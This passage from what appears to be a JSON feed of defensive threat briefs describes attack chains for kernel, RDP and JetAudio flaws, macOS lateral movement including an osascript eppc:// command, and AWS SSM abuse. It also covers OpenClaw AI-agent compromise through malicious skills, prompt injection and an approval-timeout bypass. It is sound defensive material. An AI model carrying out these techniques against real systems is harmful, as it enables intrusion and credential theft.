kernel.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eExploit Trigger:\u003c/strong\u003e The attacker triggers a specific kernel vulnerability, such as those identified as CVE-2026-23001 or CVE-2026-31402, by sending a crafted input to a vulnerable kernel component. 
The specific method depends on the nature of each CVE.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCode Execution:\u003c/strong\u003e Upon successful exploitation, the attacker achieves arbitrary code execution within the kernel context. This allows the attacker to run malicious code directly on the system.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePrivilege Escalation:\u003c/strong\u003e Leveraging the code execution capability, the attacker exploits another vulnerability (e.g., CVE-2025-68741) to escalate privileges to root or SYSTEM. This may involve exploiting race conditions, memory corruption bugs, or other privilege escalation flaws within the kernel.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSystem Control:\u003c/strong\u003e With elevated privileges, the attacker gains full control over the compromised system. They can now access sensitive data, modify system configurations, install backdoors, or move laterally to other systems within the network.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eLateral Movement (Optional):\u003c/strong\u003e The attacker uses the compromised system as a launching point to attack other systems on the network, potentially exploiting other vulnerabilities or using stolen credentials.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePersistence (Optional):\u003c/strong\u003e The attacker establishes persistence on the compromised system to maintain access even after reboots. 
This may involve installing rootkits, modifying system startup scripts, or creating rogue user accounts.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDenial of Service/Data Exfiltration/etc.:\u003c/strong\u003e Depending on their objectives, the attacker may use the compromised system to launch denial-of-service attacks against other targets, exfiltrate sensitive data, or cause other damage.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these kernel vulnerabilities can lead to complete system compromise, allowing attackers to execute arbitrary code, escalate privileges, and cause denial of service. The wide range of affected Red Hat Enterprise Linux and CodeReady Linux Builder versions implies a potentially large number of vulnerable systems. This can result in significant data breaches, system downtime, financial losses, and reputational damage for affected organizations.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply the patches provided in Red Hat Security Advisories RHSA-2026:10756, RHSA-2026:10996, and RHSA-2026:11313 to remediate the vulnerabilities.\u003c/li\u003e\n\u003cli\u003ePrioritize patching systems based on their criticality and exposure to external networks.\u003c/li\u003e\n\u003cli\u003eMonitor systems for suspicious activity that may indicate exploitation attempts, focusing on unexpected kernel module loads or privilege escalations using process_creation logging.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule detecting suspicious kernel module loading to identify potential rootkit installation attempts.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the deployed Sigma rules to determine the scope and impact of potential 
compromises.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-30T00:00:00Z","date_published":"2026-04-30T00:00:00Z","id":"/briefs/2026-04-redhat-kernel-vulns/","summary":"Multiple vulnerabilities in the Red Hat Linux kernel allow for arbitrary code execution, privilege escalation, and remote denial of service.","title":"Multiple Vulnerabilities in Red Hat Linux Kernel","url":"https://feed.craftedsignal.io/briefs/2026-04-redhat-kernel-vulns/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.5,"id":"CVE-2026-42423"}],"_cs_exploited":false,"_cs_products":["OpenClaw"],"_cs_severities":["high"],"_cs_tags":["vulnerability","privilege-escalation","execution"],"_cs_type":"advisory","_cs_vendors":["OpenClaw"],"content_html":"\u003cp\u003eOpenClaw, a software application, is vulnerable to an approval-timeout bypass (CVE-2026-42423) affecting versions prior to 2026.4.8. This vulnerability stems from a flaw in the strictInlineEval approval mechanism, where an approval-timeout fallback allows the execution of inline eval commands without explicit user approval. An attacker with low privileges can exploit this vulnerability on gateway and node exec hosts to circumvent the intended security boundary. This can lead to unauthorized command execution and potential system compromise. 
Defenders should upgrade to version 2026.4.8 or implement mitigations to prevent exploitation.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains low-privilege access to a gateway or node exec host running a vulnerable version of OpenClaw (prior to 2026.4.8).\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious inline eval command intended to be executed on the system.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to execute the malicious inline eval command, triggering the strictInlineEval approval mechanism.\u003c/li\u003e\n\u003cli\u003eThe system initiates the explicit approval process, awaiting user confirmation before executing the command.\u003c/li\u003e\n\u003cli\u003eThe attacker waits for the pre-configured approval-timeout to expire without providing any explicit approval.\u003c/li\u003e\n\u003cli\u003eThe approval-timeout fallback mechanism is triggered due to the lack of user approval within the defined timeframe.\u003c/li\u003e\n\u003cli\u003eThe system bypasses the explicit-approval requirement due to the timeout fallback, and the malicious inline eval command is executed.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves arbitrary command execution on the affected host, potentially escalating privileges and compromising the system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-42423 allows an attacker to bypass intended security boundaries and execute arbitrary commands on OpenClaw gateway and node exec hosts. This can lead to privilege escalation, unauthorized data access, and potential system compromise. The severity is rated as high (CVSS 7.5) due to the potential for significant impact on confidentiality, integrity, and availability. 
The number of affected systems depends on the deployment scope of vulnerable OpenClaw versions.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade OpenClaw to version 2026.4.8 or later to patch CVE-2026-42423.\u003c/li\u003e\n\u003cli\u003eMonitor OpenClaw logs for indicators of unauthorized inline eval command execution, focusing on unexpected activity following approval timeouts.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the blast radius of potential compromises, should an attacker successfully exploit CVE-2026-42423 and gain unauthorized access.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-29T12:00:00Z","date_published":"2026-04-29T12:00:00Z","id":"/briefs/2026-04-openclaw-approval-bypass/","summary":"OpenClaw before 2026.4.8 contains an approval-timeout fallback mechanism that allows attackers to bypass strictInlineEval explicit-approval requirements on gateway and node exec hosts, leading to arbitrary command execution.","title":"OpenClaw StrictInlineEval Approval Bypass Vulnerability (CVE-2026-42423)","url":"https://feed.craftedsignal.io/briefs/2026-04-openclaw-approval-bypass/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["macos","lotl","lateral-movement","execution"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eWith macOS adoption growing in enterprise environments, particularly among developers and DevOps teams, it has become an attractive target for malicious actors. This report highlights the under-documented \u0026ldquo;living-off-the-land\u0026rdquo; (LOTL) techniques specific to macOS. Attackers are exploiting native features like Remote Application Scripting (RAS) to achieve remote execution and are abusing Spotlight metadata (Finder comments) for payload staging, evading traditional static file analysis. 
Additionally, attackers can use built-in protocols such as SMB, Netcat, Git, TFTP, and SNMP to establish persistence and move toolkits. Defenders should shift their focus from static file scanning to monitoring process lineage, inter-process communication (IPC) anomalies, and enforcing strict MDM policies to disable unnecessary administrative services.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Access:\u003c/strong\u003e The attacker gains initial access to a macOS system, possibly through spearphishing or exploiting a vulnerability in a network service (details of initial access aren\u0026rsquo;t specified in the provided document, but this is a necessary assumption for the rest of the chain).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDiscovery:\u003c/strong\u003e The attacker uses native tools to enumerate the environment, such as \u003ccode\u003ediskutil list\u003c/code\u003e to identify connected volumes.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCredential Access:\u003c/strong\u003e The attacker attempts to access stored credentials, SSH keys, or cloud credentials.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eLateral Movement (RAS):\u003c/strong\u003e The attacker leverages Remote Application Scripting (RAS) to remotely query Finder for mounted volumes using \u003ccode\u003eosascript -e 'tell application \u0026quot;Finder\u0026quot; to get the name of every disk' eppc://user:password@target_ip\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRemote Execution (RAS):\u003c/strong\u003e The attacker uses RAS and Terminal.app as an execution proxy to bypass Apple\u0026rsquo;s security restrictions.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePayload Deployment (RAS/Base64):\u003c/strong\u003e The attacker encodes a malicious script using Base64 and uses RAS to instruct the remote Terminal.app to decode the script to a temporary file and make it 
executable using \u003ccode\u003echmod +x\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePayload Invocation (RAS/bash):\u003c/strong\u003e The attacker uses a second RAS command to explicitly invoke the deployed script via bash, ensuring a proper shell context.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePersistence (SMB/Netcat/Git/TFTP/SNMP):\u003c/strong\u003e The attacker utilizes built-in protocols such as SMB, Netcat, Git, TFTP, or SNMP to establish persistence on the compromised system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these LOTL techniques allows attackers to bypass traditional security controls on macOS systems, leading to unauthorized access to sensitive data, source code repositories, and cloud infrastructure. With over 45% of organizations utilizing macOS, these attacks can result in significant financial losses, reputational damage, and disruption of business operations. 
Compromised developer or DevOps workstations can be leveraged as pivot points to further compromise production environments.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor process creation events for \u003ccode\u003eosascript\u003c/code\u003e executing with the \u003ccode\u003eeppc://\u003c/code\u003e URI to detect potential RAS-based lateral movement (see Sigma rule \u0026ldquo;Detect Remote Apple Event Lateral Movement\u0026rdquo;).\u003c/li\u003e\n\u003cli\u003eMonitor process creation for \u003ccode\u003eTerminal.app\u003c/code\u003e executing \u003ccode\u003ebash\u003c/code\u003e with command-line arguments indicative of Base64 decoding and execution to identify RAS-based remote execution attempts (see Sigma rule \u0026ldquo;Detect Terminal.app as Execution Proxy\u0026rdquo;).\u003c/li\u003e\n\u003cli\u003eImplement strict MDM policies to disable unnecessary administrative services and protocols like Remote Apple Events to reduce the attack surface.\u003c/li\u003e\n\u003cli\u003eMonitor inter-process communication (IPC) anomalies, particularly involving \u003ccode\u003eAppleEventsD\u003c/code\u003e, to identify suspicious activity related to RAS.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process-creation logging to capture the process lineage and command-line arguments necessary for the rules above.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-21T10:01:16Z","date_published":"2026-04-21T10:01:16Z","id":"/briefs/2026-04-bad-apples-macos-lotl/","summary":"Adversaries are increasingly targeting macOS environments, leveraging native tools like Remote Application Scripting (RAS) and Spotlight metadata to bypass security controls for remote code execution and lateral movement.","title":"Bad Apples: Weaponizing Native macOS Primitives for Lateral Movement and 
Execution","url":"https://feed.craftedsignal.io/briefs/2026-04-bad-apples-macos-lotl/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-32157"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-32157","use-after-free","remote-desktop","execution"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-32157 is a critical use-after-free vulnerability affecting the Remote Desktop Client. This flaw allows an unauthenticated attacker to achieve remote code execution on a vulnerable system simply by interacting with the RDP service over a network. The vulnerability stems from improper memory management within the RDP client, leading to a condition where a program attempts to access memory that has already been freed, potentially resulting in arbitrary code execution. Successful exploitation of this vulnerability could lead to complete system compromise. The CVE was published on 2026-04-14, and defenders should prioritize patching and monitoring for exploitation attempts.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a vulnerable Remote Desktop Client via network scanning or other reconnaissance methods.\u003c/li\u003e\n\u003cli\u003eAttacker crafts a malicious RDP request designed to trigger the use-after-free vulnerability.\u003c/li\u003e\n\u003cli\u003eThe crafted RDP request is sent to the target system via TCP port 3389 (default RDP port).\u003c/li\u003e\n\u003cli\u003eThe Remote Desktop Client on the target system processes the malicious request, triggering the memory corruption.\u003c/li\u003e\n\u003cli\u003eThe use-after-free condition allows the attacker to overwrite memory, potentially injecting malicious code.\u003c/li\u003e\n\u003cli\u003eThe injected code is executed within the context of the Remote Desktop Client process (mstsc.exe).\u003c/li\u003e\n\u003cli\u003eThe attacker gains control of the system, 
potentially escalating privileges to SYSTEM.\u003c/li\u003e\n\u003cli\u003eThe attacker can then install malware, exfiltrate data, or perform other malicious actions.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-32157 can lead to complete compromise of the affected system. An attacker could gain unauthorized access to sensitive data, install malware, or use the compromised system as a foothold to pivot to other systems on the network. Given the ubiquitous nature of RDP in enterprise environments, a successful widespread exploitation could have significant impact across various sectors.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply the patch released by Microsoft to address CVE-2026-32157 immediately on all systems running Remote Desktop Client. The advisory URL is \u003ca href=\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32157\"\u003ehttps://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32157\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided in this brief to your SIEM to detect potential exploitation attempts targeting CVE-2026-32157.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for suspicious RDP connections and unusual activity originating from the mstsc.exe process based on the \u003ccode\u003enetwork_connection\u003c/code\u003e and \u003ccode\u003eprocess_creation\u003c/code\u003e Sigma rules.\u003c/li\u003e\n\u003cli\u003eEnable process creation logging to capture the execution of any malicious code injected via this vulnerability, as covered by the \u003ccode\u003eprocess_creation\u003c/code\u003e Sigma rule.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-15T12:00:00Z","date_published":"2026-04-15T12:00:00Z","id":"/briefs/2026-04-rdp-use-after-free/","summary":"CVE-2026-32157 is a use-after-free vulnerability in the Remote 
Desktop Client that allows an unauthorized attacker to execute code over a network.","title":"CVE-2026-32157 - Remote Desktop Client Use-After-Free Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-rdp-use-after-free/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["low"],"_cs_tags":["cloud","aws","ssm","execution"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThis rule identifies when an AWS Systems Manager (SSM) command document is created by a user or role who does not typically perform this action. The rule focuses on detecting anomalous creation of SSM command documents. Adversaries may create SSM command documents to execute commands on managed instances, potentially leading to unauthorized access, command and control, and data exfiltration. The rule utilizes AWS CloudTrail logs to monitor the \u003ccode\u003eCreateDocument\u003c/code\u003e API call within the SSM service. This activity is flagged when the user or role creating the document deviates from established patterns, indicating a potential security risk. 
This detection is relevant for organizations using AWS SSM for managing their infrastructure and aims to prevent unauthorized command execution on managed instances.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to an AWS account, potentially through compromised credentials or an exposed IAM role.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to create a new SSM Command document using the \u003ccode\u003eCreateDocument\u003c/code\u003e API call.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eCreateDocument\u003c/code\u003e API call is logged by AWS CloudTrail with details about the user identity, request parameters, and document description.\u003c/li\u003e\n\u003cli\u003eThe detection rule analyzes CloudTrail logs, specifically looking for the \u003ccode\u003eCreateDocument\u003c/code\u003e event with a document type of \u003ccode\u003eCommand\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe rule identifies the user or role associated with the \u003ccode\u003eCreateDocument\u003c/code\u003e API call by inspecting the \u003ccode\u003eaws.cloudtrail.user_identity.arn\u003c/code\u003e field.\u003c/li\u003e\n\u003cli\u003eIf the user or role is considered rare or unusual for creating SSM Command documents within the organization, the rule triggers an alert.\u003c/li\u003e\n\u003cli\u003eThe attacker could then use the created document to execute arbitrary commands on managed instances.\u003c/li\u003e\n\u003cli\u003eSuccessful execution of these commands leads to various impacts, including unauthorized access, command and control, data exfiltration, or disruption of services.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe successful exploitation of this technique can lead to unauthorized access to AWS resources, potentially affecting all systems managed by AWS SSM in the targeted environment. 
The creation of malicious SSM command documents can lead to data exfiltration, system compromise, or denial of service. If successful, this can impact hundreds or thousands of systems depending on the scope of AWS SSM usage in the organization.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;AWS SSM Command Document Created by Rare User\u0026rdquo; to your SIEM, ensuring proper indexing of CloudTrail logs (index = [\u0026ldquo;filebeat-*\u0026rdquo;, \u0026ldquo;logs-aws.cloudtrail-*\u0026rdquo;]).\u003c/li\u003e\n\u003cli\u003eReview the \u003ccode\u003eaws.cloudtrail.request_parameters.content\u003c/code\u003e field in the CloudTrail logs for any suspicious commands within the created SSM document.\u003c/li\u003e\n\u003cli\u003eRestrict SSM document creation permissions to specific, trusted roles or users to prevent unauthorized document creation as mentioned in the overview.\u003c/li\u003e\n\u003cli\u003eMonitor the \u003ccode\u003eSendCommand\u003c/code\u003e API call related to the created SSM document to see if it is used to execute commands on managed instances, as described in the triage section.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-10T16:27:52Z","date_published":"2026-04-10T16:27:52Z","id":"/briefs/2024-11-aws-ssm-rare-user/","summary":"An AWS Systems Manager (SSM) command document creation by a user or role who does not typically perform this action, which can lead to unauthorized access, command and control, or data exfiltration.","title":"AWS SSM Command Document Created by Rare User","url":"https://feed.craftedsignal.io/briefs/2024-11-aws-ssm-rare-user/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["aws","ec2","ssm","lolbin","execution","cloud"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThis threat brief focuses on detecting the execution of 
Living Off the Land Binaries (LOLBins) or GTFOBins on Amazon EC2 instances via AWS Systems Manager (SSM) \u003ccode\u003eSendCommand\u003c/code\u003e API. The technique involves correlating AWS CloudTrail \u003ccode\u003eSendCommand\u003c/code\u003e events with endpoint process execution by matching SSM command IDs. While AWS redacts command parameters in CloudTrail logs, this correlation technique reveals the actual commands executed on EC2 instances. This is critical because adversaries may abuse SSM to execute malicious commands remotely without requiring SSH or RDP access. They can leverage legitimate system utilities for various malicious purposes, including data exfiltration, establishing reverse shells, or facilitating lateral movement within the cloud environment. The rule was last updated on 2026-04-10.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to AWS via compromised credentials or an exposed IAM role.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the AWS CLI or API to initiate an SSM \u003ccode\u003eSendCommand\u003c/code\u003e to a target EC2 instance. The \u003ccode\u003eDocumentName\u003c/code\u003e parameter is set to \u003ccode\u003eAWS-RunShellScript\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe SSM agent on the EC2 instance receives the \u003ccode\u003eSendCommand\u003c/code\u003e request.\u003c/li\u003e\n\u003cli\u003eThe SSM agent executes a shell script (\u003ccode\u003e_script.sh\u003c/code\u003e) within a dedicated directory for orchestration.\u003c/li\u003e\n\u003cli\u003eThe shell script executes a LOLBin, such as \u003ccode\u003ecurl\u003c/code\u003e, \u003ccode\u003ewget\u003c/code\u003e, \u003ccode\u003epython\u003c/code\u003e, or \u003ccode\u003eperl\u003c/code\u003e, to perform malicious actions. 
The parent process of the LOLBin will be the SSM shell script.\u003c/li\u003e\n\u003cli\u003eThe LOLBin is used to download a malicious payload, establish a reverse shell, or exfiltrate data.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the established reverse shell to perform further actions on the EC2 instance.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to unauthorized access to EC2 instances, data exfiltration, deployment of malware, and lateral movement within the AWS environment. Although the number of impacted organizations is not available, this attack can bypass traditional network security controls. Organizations in any sector utilizing AWS EC2 instances and SSM are potentially at risk. The lack of required SSH or RDP access makes this technique particularly stealthy.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable AWS CloudTrail logging to capture \u003ccode\u003eSendCommand\u003c/code\u003e events and monitor for \u003ccode\u003eAWS-RunShellScript\u003c/code\u003e in the \u003ccode\u003erequest_parameters\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect AWS EC2 LOLBin Execution via SSM SendCommand\u0026rdquo; to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eMonitor endpoint process execution logs for the execution of LOLBins like \u003ccode\u003ecurl\u003c/code\u003e, \u003ccode\u003ewget\u003c/code\u003e, \u003ccode\u003epython\u003c/code\u003e, \u003ccode\u003eperl\u003c/code\u003e, \u003ccode\u003enc\u003c/code\u003e, etc., with parent processes related to SSM.\u003c/li\u003e\n\u003cli\u003eImplement strict IAM policies to restrict SSM \u003ccode\u003eSendCommand\u003c/code\u003e permissions to only authorized users and roles.\u003c/li\u003e\n\u003cli\u003eReview and audit existing SSM configurations to identify and 
remediate any overly permissive settings.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-10T16:27:52Z","date_published":"2026-04-10T16:27:52Z","id":"/briefs/2024-01-03-aws-ec2-lolbin-ssm/","summary":"Detection of Living Off the Land Binaries (LOLBins) or GTFOBins execution on EC2 instances via AWS Systems Manager (SSM) SendCommand API, potentially indicating malicious activity.","title":"AWS EC2 LOLBin Execution via SSM SendCommand","url":"https://feed.craftedsignal.io/briefs/2024-01-03-aws-ec2-lolbin-ssm/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["ai-agent","execution","malware","credential-theft"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOpenClaw (formerly Clawdbot, rebranded to Moltbot) is an AI coding assistant that can execute shell commands and scripts. Threat actors are exploiting the skill ecosystem (ClawHub) to distribute malicious skills, observed as early as January 2026, that execute download-and-execute commands, targeting cryptocurrency wallets and credentials. These skills are often obfuscated and distributed through public registries like ClawHub. The attacks leverage the AI agents\u0026rsquo; ability to execute commands through skills or prompt injection. Defenders should monitor for suspicious child processes spawned by Node.js processes running OpenClaw/Moltbot, as these may indicate malicious activity originating from compromised or malicious skills. 
This activity has been observed across Linux, macOS, and Windows environments.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA user installs the OpenClaw agent, potentially from a legitimate or typosquatted domain.\u003c/li\u003e\n\u003cli\u003eThe user installs a malicious skill from ClawHub or is subject to a prompt injection attack.\u003c/li\u003e\n\u003cli\u003eThe OpenClaw agent, running under Node.js, receives a command to execute a shell command.\u003c/li\u003e\n\u003cli\u003eThe Node.js process spawns a shell process (e.g., bash, sh, cmd.exe, powershell.exe).\u003c/li\u003e\n\u003cli\u003eThe shell process executes a command to download a payload from a remote server using tools like curl or certutil.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload is saved to disk, often with an obfuscated name.\u003c/li\u003e\n\u003cli\u003eThe shell process executes the downloaded payload using chmod +x and ./, rundll32.exe, or powershell.exe.\u003c/li\u003e\n\u003cli\u003eThe payload performs malicious actions such as credential theft or cryptocurrency wallet compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromised OpenClaw agents can lead to cryptocurrency wallet theft, credential compromise, and potential data exfiltration. A successful attack allows threat actors to gain access to sensitive data and potentially pivot to other systems on the network. The number of victims is currently unknown, but the targeting of cryptocurrency wallets suggests financially motivated actors. 
The observed typosquatting activity indicates a campaign to impersonate the legitimate software and trick users into installing malicious versions.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor process creation events for suspicious child processes of Node.js processes running OpenClaw/Moltbot, specifically shells and scripting interpreters, using the provided Sigma rule (\u003ca href=\"#execution-via-openclaw-agent---linuxmacoswindows\"\u003eExecution via OpenClaw Agent - Linux/macOS/Windows\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eBlock known typosquat domains (moltbot.you, clawbot.ai, clawdbot.you) at the DNS resolver based on the IOCs provided.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of unsigned or untrusted executables, mitigating the impact of downloaded payloads.\u003c/li\u003e\n\u003cli\u003eReview OpenClaw skill installation logs and user AI conversation history for signs of malicious activity or prompt injection attempts.\u003c/li\u003e\n\u003cli\u003eEnable process command-line auditing to capture the full command line of spawned processes, aiding in the identification of malicious commands.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect execution of curl/certutil downloads (\u003ca href=\"#openclaw-download-activity\"\u003eOpenClaw Download Activity\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-08T12:07:54Z","date_published":"2026-04-08T12:07:54Z","id":"/briefs/2026-06-openclaw-execution/","summary":"Malicious actors are exploiting OpenClaw, Moltbot, and Clawdbot AI coding agents via Node.js to execute arbitrary shell commands and download-and-execute commands, potentially targeting cryptocurrency wallets and credentials.","title":"OpenClaw Agent Suspicious Child Process 
Execution","url":"https://feed.craftedsignal.io/briefs/2026-06-openclaw-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["buffer-overflow","privilege-escalation","execution","windows"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eJetAudio jetCast Server 2.0 is susceptible to a stack-based buffer overflow vulnerability (CVE-2019-25609) within the Log Directory configuration field. This flaw allows a local attacker with access to the server\u0026rsquo;s configuration settings to overwrite Structured Exception Handling (SEH) pointers. By injecting carefully crafted, alphanumeric-encoded shellcode into the Log Directory field, an attacker can trigger an SEH exception handler. This ultimately leads to the execution of arbitrary code under the privileges of the application. The vulnerability poses a significant risk to systems running the vulnerable software, as it enables local privilege escalation and potentially complete system compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains local access to a system running JetAudio jetCast Server 2.0.\u003c/li\u003e\n\u003cli\u003eAttacker identifies the Log Directory configuration setting within JetCast Server 2.0.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts alphanumeric shellcode designed to overwrite the SEH chain.\u003c/li\u003e\n\u003cli\u003eThe attacker injects the malicious shellcode into the Log Directory configuration field, exceeding the expected buffer size.\u003c/li\u003e\n\u003cli\u003eThe application attempts to handle the oversized input, causing a stack-based buffer overflow.\u003c/li\u003e\n\u003cli\u003eThe overflow corrupts the SEH chain, replacing legitimate handler addresses with attacker-controlled addresses.\u003c/li\u003e\n\u003cli\u003eAn exception is triggered within the application due to the corrupted 
state.\u003c/li\u003e\n\u003cli\u003eThe SEH handler is invoked, redirecting execution to the attacker\u0026rsquo;s shellcode, resulting in arbitrary code execution with application privileges.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a local attacker to execute arbitrary code with the privileges of the JetAudio jetCast Server application. Given the base CVSS score of 8.4, this could lead to complete system compromise, including data theft, modification, or destruction. While the number of affected installations is unknown, organizations utilizing JetAudio jetCast Server 2.0 are at risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply available patches or upgrade to a secure version of JetAudio jetCast Server to remediate CVE-2019-25609.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for unusual processes spawned by the JetAudio jetCast Server process (see process creation rule below).\u003c/li\u003e\n\u003cli\u003eImplement access controls to restrict who can modify the Log Directory configuration, mitigating the initial access vector.\u003c/li\u003e\n\u003cli\u003eMonitor network connections originating from the JetAudio jetCast Server process to detect potential command and control activity after successful exploitation (see network connection rule below).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-24T12:00:00Z","date_published":"2026-03-24T12:00:00Z","id":"/briefs/2026-03-jetaudio-stack-overflow/","summary":"JetAudio jetCast Server 2.0 is vulnerable to a stack-based buffer overflow in the Log Directory configuration, enabling local attackers to overwrite structured exception handling pointers and execute arbitrary code.","title":"JetAudio jetCast Server 2.0 Stack-Based Buffer 
